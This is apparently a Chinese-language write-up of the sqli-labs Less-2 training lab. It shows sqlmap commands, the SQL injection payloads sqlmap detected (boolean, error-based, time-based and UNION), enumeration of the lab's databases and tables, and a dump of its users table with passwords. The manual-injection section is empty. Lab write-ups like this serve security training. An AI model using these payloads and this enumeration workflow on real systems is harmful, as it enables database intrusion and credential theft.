题目地址:http://web-labs.rinue.top/sqli-labs/Less-2
方法一:SQLmap
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch
--- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 8793=8793 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1 AND (SELECT 7770 FROM(SELECT COUNT(*),CONCAT(0x71767a6b71,(SELECT (ELT(7770=7770,1))),0x7178706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 6195 FROM (SELECT(SLEEP(5)))dCRn) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-6064 UNION ALL SELECT NULL,NULL,CONCAT(0x71767a6b71,0x7668425342434b6e77446c74636950446778495a765543756c7a77524556537a78714a464d5a6a4b,0x7178706a71)-- RFsl
查询数据库
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch --dbs
available databases [8]: [*] challenges [*] information_schema [*] mysql [*] performance_schema [*] Python [*] security [*] SQL5 [*] YaoGuang
查询数据库中的表
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security --tables
Database: security [4 tables] ---------- | emails | | referers | | uagents | | users | ----------
查询表中的字段
sqlmap -u "http://web-labs.rinue.top/sqli-labs/Less-2/?id=1" --dbms=mysql --batch -D security -T users --columns
Database: security Table: users [3 columns] ---------- ------------- | Column | Type | ---------- ------------- | id | int(3) | | password | varchar(20) | | username | varchar(20) | ---------- -------------
查询表中的内容
Database: security Table: users [13 entries] ------------ ---------- | password | username | ------------ ---------- | Dumb | Dumb | | I-kill-you | Angelina | | [email protected] | Dummy | | crappy | secure | | stupidity | stupid | | genious | superman | | mob!le | batman | | admin | admin | | admin1 | admin1 | | admin2 | admin2 | | admin3 | admin3 | | dumbo | dhakkan | | admin4 | admin4 | ------------ ----------
方法二:手工注入
。。。